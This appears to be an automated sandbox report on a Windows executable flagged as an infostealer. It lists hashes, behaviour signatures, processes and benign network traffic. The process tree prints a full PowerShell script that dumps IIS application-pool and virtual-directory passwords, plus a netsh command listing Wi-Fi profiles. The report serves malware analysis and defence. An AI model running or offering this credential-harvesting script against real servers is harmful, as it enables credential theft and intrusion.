Overview

overview

10

Static

static

10

cb45bfa4b2...32.exe

windows7-x64

7

cb45bfa4b2...32.exe

windows10-2004-x64

7

cb48b9ffc8...ab.exe

windows7-x64

10

cb48b9ffc8...ab.exe

windows10-2004-x64

10

cb642e19ad...e6.exe

windows7-x64

7

cb642e19ad...e6.exe

windows10-2004-x64

7

cb64f92875...a6.exe

windows7-x64

7

cb64f92875...a6.exe

windows10-2004-x64

7

cb81b6d0e8...88.exe

windows7-x64

10

cb81b6d0e8...88.exe

windows10-2004-x64

10

cbaee22513...a5.exe

windows7-x64

10

cbaee22513...a5.exe

windows10-2004-x64

10

cbbf316076...27.exe

windows7-x64

1

cbbf316076...27.exe

windows10-2004-x64

1

cbc319d807...7c.exe

windows7-x64

10

cbc319d807...7c.exe

windows10-2004-x64

10

cbe09d8033...e7.exe

windows7-x64

10

cbe09d8033...e7.exe

windows10-2004-x64

10

cbf8cf5e7e...d1.exe

windows7-x64

10

cbf8cf5e7e...d1.exe

windows10-2004-x64

10

cbf9083762...57.exe

windows7-x64

10

cbf9083762...57.exe

windows10-2004-x64

10

cc027f345e...df.exe

windows7-x64

10

cc027f345e...df.exe

windows10-2004-x64

10

cc22848f9c...20.exe

windows7-x64

10

cc22848f9c...20.exe

windows10-2004-x64

10

cc25555aa2...ec.exe

windows7-x64

10

cc25555aa2...ec.exe

windows10-2004-x64

10

cc52f061bf...a0.exe

windows7-x64

6

cc52f061bf...a0.exe

windows10-2004-x64

6

cc609db84e...1e.exe

windows7-x64

7

cc609db84e...1e.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    103s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/03/2025, 06:16 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cb642e19add36851188765fe429e485b62403879d2ce5bac98ae13ea4e55c1e6.exe

  • Size

    9.7MB

  • MD5

    f7338353f580b0a71f1c73ad2477940f

  • SHA1

    b60d7a46dab10e5157039c1921ebdaa88a839ca4

  • SHA256

    cb642e19add36851188765fe429e485b62403879d2ce5bac98ae13ea4e55c1e6

  • SHA512

    949a1d5884243bdd978e160fc22f6930c87b27760bfac9a96ea4c85ad7f5f5ac6fea7c242eb12c5924725fb8b2cc9ccf3d3f043320f8abe6c8b572a0cc2b0c5e

  • SSDEEP

    196608:l6vZPKGVBFUcwti7TQlyVN8iNISRTRmW5QZ0:wI6HwtQQlyXOOQ

Score
7/10
defense_evasiondiscoverypersistenceprivilege_escalationspywarestealertrojan

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    defense_evasiontrojan
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\cb642e19add36851188765fe429e485b62403879d2ce5bac98ae13ea4e55c1e6.exe
    "C:\Users\Admin\AppData\Local\Temp\cb642e19add36851188765fe429e485b62403879d2ce5bac98ae13ea4e55c1e6.exe"
    1⤵
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Enumerates connected drives
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:6008
    • C:\Windows\SYSTEM32\systeminfo.exe
      "systeminfo.exe"
      2⤵
      • Gathers system information
      PID:4556
    • C:\Windows\SYSTEM32\netsh.exe
      "netsh" wlan show profiles
      2⤵
      • Event Triggered Execution: Netsh Helper DLL
      • System Network Configuration Discovery: Wi-Fi Discovery
      PID:5620
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" # Check if appcmd.exe exists if (Test-Path ('C:\Windows\system32\inetsrv\appcmd.exe')) { # Create data table to house results $DataTable = New-Object System.Data.DataTable # Create and name columns in the data table $Null = $DataTable.Columns.Add('user') $Null = $DataTable.Columns.Add('pass') $Null = $DataTable.Columns.Add('type') $Null = $DataTable.Columns.Add('vdir') $Null = $DataTable.Columns.Add('apppool') # Get list of application pools Invoke-Expression 'C:\Windows\system32\inetsrv\appcmd.exe list apppools /text:name' | ForEach-Object { # Get application pool name $PoolName = $_ # Get username $PoolUserCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list apppool ' + $PoolName + ' /text:processmodel.username' $PoolUser = Invoke-Expression $PoolUserCmd # Get password $PoolPasswordCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list apppool ' + $PoolName + ' /text:processmodel.password' $PoolPassword = Invoke-Expression $PoolPasswordCmd # Check if credentials exists if (($PoolPassword -ne '') -and ($PoolPassword -isnot [system.array])) { # Add credentials to database $Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName) } } # Get list of virtual directories Invoke-Expression 'C:\Windows\system32\inetsrv\appcmd.exe list vdir /text:vdir.name' | ForEach-Object { # Get Virtual Directory Name $VdirName = $_ # Get username $VdirUserCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list vdir ' + $VdirName + ' /text:userName' $VdirUser = Invoke-Expression $VdirUserCmd # Get password $VdirPasswordCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list vdir ' + $VdirName + ' /text:password' $VdirPassword = Invoke-Expression $VdirPasswordCmd # Check if credentials exists if (($VdirPassword -ne '') -and ($VdirPassword -isnot [system.array])) { # Add credentials to database $Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA') } } # Check if any passwords were found if( $DataTable.rows.Count -gt 0 ) { # Display results in list view that can feed into the pipeline #$DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique $DataTable | Select-Object user,pass,type,vdir,apppool } else { # Status user Write-host 'No application pool or virtual directory passwords were found.' } }
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5248
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x514 0x3ac
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1700

Network

  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.ax-0001.ax-msedge.net
    g-bing-com.ax-0001.ax-msedge.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f0aa5533305c4181949deda0fcf4acc5&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f0aa5533305c4181949deda0fcf4acc5&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=1AA7C180E9AF6FF818ABD437E84F6E45; domain=.bing.com; expires=Thu, 16-Apr-2026 06:33:27 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: FEA2546E97744A9A9CC6F20B1B8C8E10 Ref B: LON04EDGE1115 Ref C: 2025-03-22T06:33:27Z
    date: Sat, 22 Mar 2025 06:33:27 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f0aa5533305c4181949deda0fcf4acc5&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f0aa5533305c4181949deda0fcf4acc5&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=1AA7C180E9AF6FF818ABD437E84F6E45
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=uw5b9dsiGG0Omf6bRHxxyE0BCVR2xmn4IRqqu-CbicA; domain=.bing.com; expires=Thu, 16-Apr-2026 06:33:27 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: ED912498CE0047E2AF271DFC332765A9 Ref B: LON04EDGE1115 Ref C: 2025-03-22T06:33:27Z
    date: Sat, 22 Mar 2025 06:33:27 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f0aa5533305c4181949deda0fcf4acc5&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f0aa5533305c4181949deda0fcf4acc5&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=1AA7C180E9AF6FF818ABD437E84F6E45; MSPTC=uw5b9dsiGG0Omf6bRHxxyE0BCVR2xmn4IRqqu-CbicA
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B62C1935EBC94078B64503F22E9E6A27 Ref B: LON04EDGE1115 Ref C: 2025-03-22T06:33:27Z
    date: Sat, 22 Mar 2025 06:33:27 GMT
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340418568_12QU0TF0Q0S6KJNUT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239340418568_12QU0TF0Q0S6KJNUT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 550329
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 24B01C2552B74D3AAFD55D91F48B34E6 Ref B: LON04EDGE0621 Ref C: 2025-03-22T06:34:02Z
    date: Sat, 22 Mar 2025 06:34:02 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239355235432_11K71SSHV5QGQD37N&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239355235432_11K71SSHV5QGQD37N&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 363894
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 2FDC51DDB4484A30B6E675830E07D942 Ref B: LON04EDGE0621 Ref C: 2025-03-22T06:34:02Z
    date: Sat, 22 Mar 2025 06:34:02 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360526658_1O3WYEZK6VX7G9BK6&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239360526658_1O3WYEZK6VX7G9BK6&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 581717
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 6DE7A4ED3DAD4016A0B6177B7AD1E93F Ref B: LON04EDGE0621 Ref C: 2025-03-22T06:34:02Z
    date: Sat, 22 Mar 2025 06:34:02 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239355235433_11OUP2PBME21J4MUN&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239355235433_11OUP2PBME21J4MUN&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 403119
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 15086900C51B42E4AA2B917720259E9A Ref B: LON04EDGE0621 Ref C: 2025-03-22T06:34:02Z
    date: Sat, 22 Mar 2025 06:34:02 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340418567_1CP2YH6ACBDMHMMFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239340418567_1CP2YH6ACBDMHMMFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 700191
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 86CC7B51277343A9A337D3B1200B581F Ref B: LON04EDGE0621 Ref C: 2025-03-22T06:34:02Z
    date: Sat, 22 Mar 2025 06:34:02 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360526659_1DEB5NSYP58G2E8T3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.28.10:443
    Request
    GET /th?id=OADD2.10239360526659_1DEB5NSYP58G2E8T3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 586035
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 3EC8AADC04B94EED93F53A971BFBBF80 Ref B: LON04EDGE0621 Ref C: 2025-03-22T06:34:02Z
    date: Sat, 22 Mar 2025 06:34:02 GMT
  • flag-us
    DNS
    c.pki.goog
    Remote address:
    8.8.8.8:53
    Request
    c.pki.goog
    IN A
    Response
    c.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.180.3
  • flag-gb
    GET
    http://c.pki.goog/r/r1.crl
    Remote address:
    142.250.180.3:80
    Request
    GET /r/r1.crl HTTP/1.1
    Cache-Control: max-age = 3000
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: c.pki.goog
    Response
    HTTP/1.1 304 Not Modified
    Date: Sat, 22 Mar 2025 06:22:22 GMT
    Expires: Sat, 22 Mar 2025 07:12:22 GMT
    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
    Cache-Control: public, max-age=3000
    Vary: Accept-Encoding
    Age: 753
  • 150.171.27.10:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f0aa5533305c4181949deda0fcf4acc5&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid=
    tls, http2
    2.0kB
     9.4kB
     22
    19

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f0aa5533305c4181949deda0fcf4acc5&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f0aa5533305c4181949deda0fcf4acc5&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f0aa5533305c4181949deda0fcf4acc5&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid=

    HTTP Response

    204
  • 150.171.28.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
     6.9kB
     15
    12
  • 150.171.28.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
     6.9kB
     15
    13
  • 150.171.28.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
     6.9kB
     15
    13
  • 150.171.28.10:443
    https://tse1.mm.bing.net/th?id=OADD2.10239360526659_1DEB5NSYP58G2E8T3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    tls, http2
    113.3kB
     3.3MB
     2389
    2383

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418568_12QU0TF0Q0S6KJNUT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239355235432_11K71SSHV5QGQD37N&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360526658_1O3WYEZK6VX7G9BK6&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239355235433_11OUP2PBME21J4MUN&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418567_1CP2YH6ACBDMHMMFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360526659_1DEB5NSYP58G2E8T3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Response

    200
  • 150.171.28.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
     6.9kB
     15
    12
  • 142.250.180.3:80
    http://c.pki.goog/r/r1.crl
    http
    384 B
     354 B
     4
    3

    HTTP Request

    GET http://c.pki.goog/r/r1.crl

    HTTP Response

    304
  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
     148 B
     1
    1

    DNS Request

    g.bing.com

    DNS Response

    150.171.27.10
    150.171.28.10

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
     170 B
     1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    150.171.28.10
    150.171.27.10

  • 8.8.8.8:53
    c.pki.goog
    dns
    56 B
     107 B
     1
    1

    DNS Request

    c.pki.goog

    DNS Response

    142.250.180.3

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Costura\27562734BD0EFF9434A8AA8BED4CA874\64\sqlite.interop.dll
    Filesize

    1.9MB

    MD5

    4429241f22fa62df22cd4f7772b44aa1

    SHA1

    9c7a5356c4fe02316e9e9688717ce70ebf322fba

    SHA256

    5459fab6809a11c2148c235fdf8c431fe370d3f12ff25c054750f47082ccc1c9

    SHA512

    43e2b7aebbb5faec5ca8468932403509e8a75eae7154d597e0b4064508ac6225867f2ebe37025135f9523a34b3fadd4deeecc80b8378d94b1001c68647b54dfe

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u0osyxxv.ect.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/5248-23-0x0000016C509A0000-0x0000016C509C2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/6008-20-0x000001F5F8100000-0x000001F5F811E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/6008-21-0x000001F5F8950000-0x000001F5F895A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/6008-8-0x00007FFF59F00000-0x00007FFF5A9C1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/6008-9-0x00007FFF59F03000-0x00007FFF59F05000-memory.dmp

    Filesize

    8KB

    Download

  • memory/6008-10-0x00007FFF59F00000-0x00007FFF5A9C1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/6008-11-0x000001F5F9E30000-0x000001F5FA7E4000-memory.dmp

    Filesize

    9.7MB

    Download

  • memory/6008-12-0x00007FFF59F00000-0x00007FFF5A9C1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/6008-13-0x000001F5F80B0000-0x000001F5F8100000-memory.dmp

    Filesize

    320KB

    Download

